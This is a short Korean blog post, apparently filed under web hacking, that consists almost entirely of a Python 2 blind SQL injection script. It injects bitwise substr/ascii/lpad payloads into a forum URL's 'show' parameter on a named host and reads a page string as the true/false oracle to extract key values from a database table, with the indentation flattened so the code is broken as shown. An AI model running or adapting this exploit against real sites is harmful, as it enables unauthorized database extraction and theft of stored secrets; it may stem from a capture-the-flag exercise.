#!/usr/bin/python
import urllib2,urllib,time
# select database()
#query = "1 and (substr((lpad(bin(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))),7,0)),1,1)=1)"
#5F5F5F5F5F5F5F5F5F5F5F5F313339313533363335
target = "select group_concat(keystr) from KeyDB.kt1509 where signature like 0x3234306136346465633530615F5F5F5F5F5F5F5F"
x = 0
answer = ""
while 1:
x +=1
ch = 0
for i in range(1,8):
url = "http://poworks.com/index.php/forum/?cid=0&show="
#att = "1 and ascii(substr((%s),%d,1))=%d"%(target,x,i)
att = "1 and (substr((select lpad( bin( ascii(substr((%s),%d,1)) ),7,0)) ,%d,1)=1)#"%(target,x,i)
att = urllib.quote(att)
url += att
req = urllib2.Request(url)
result = urllib2.urlopen(req).read()
#print result
r = result.find("No replies posted yet.")
if r > -1:
ch += 2**(7-i)
else:
pass
if ch == 0:
break
else:
answer += chr(ch)
print ":) : "+ answer
print "END : ",answer
'Web_Hacking' 카테고리의 다른 글
| SQLMAP sql injectionor (0) | 2015.03.03 |
|---|---|
| php mail function php injection (0) | 2014.11.08 |
| 파일내에 exec 계열 함수 사용 여부 (내용으로검색) (0) | 2013.10.05 |
| [white hacking] 화이트 해킹대회 web PPPPAAAASSSWWW... (150Point) (0) | 2013.09.15 |
| [White Hacking] Serial2 web(150 point) Write-up (0) | 2013.09.15 |
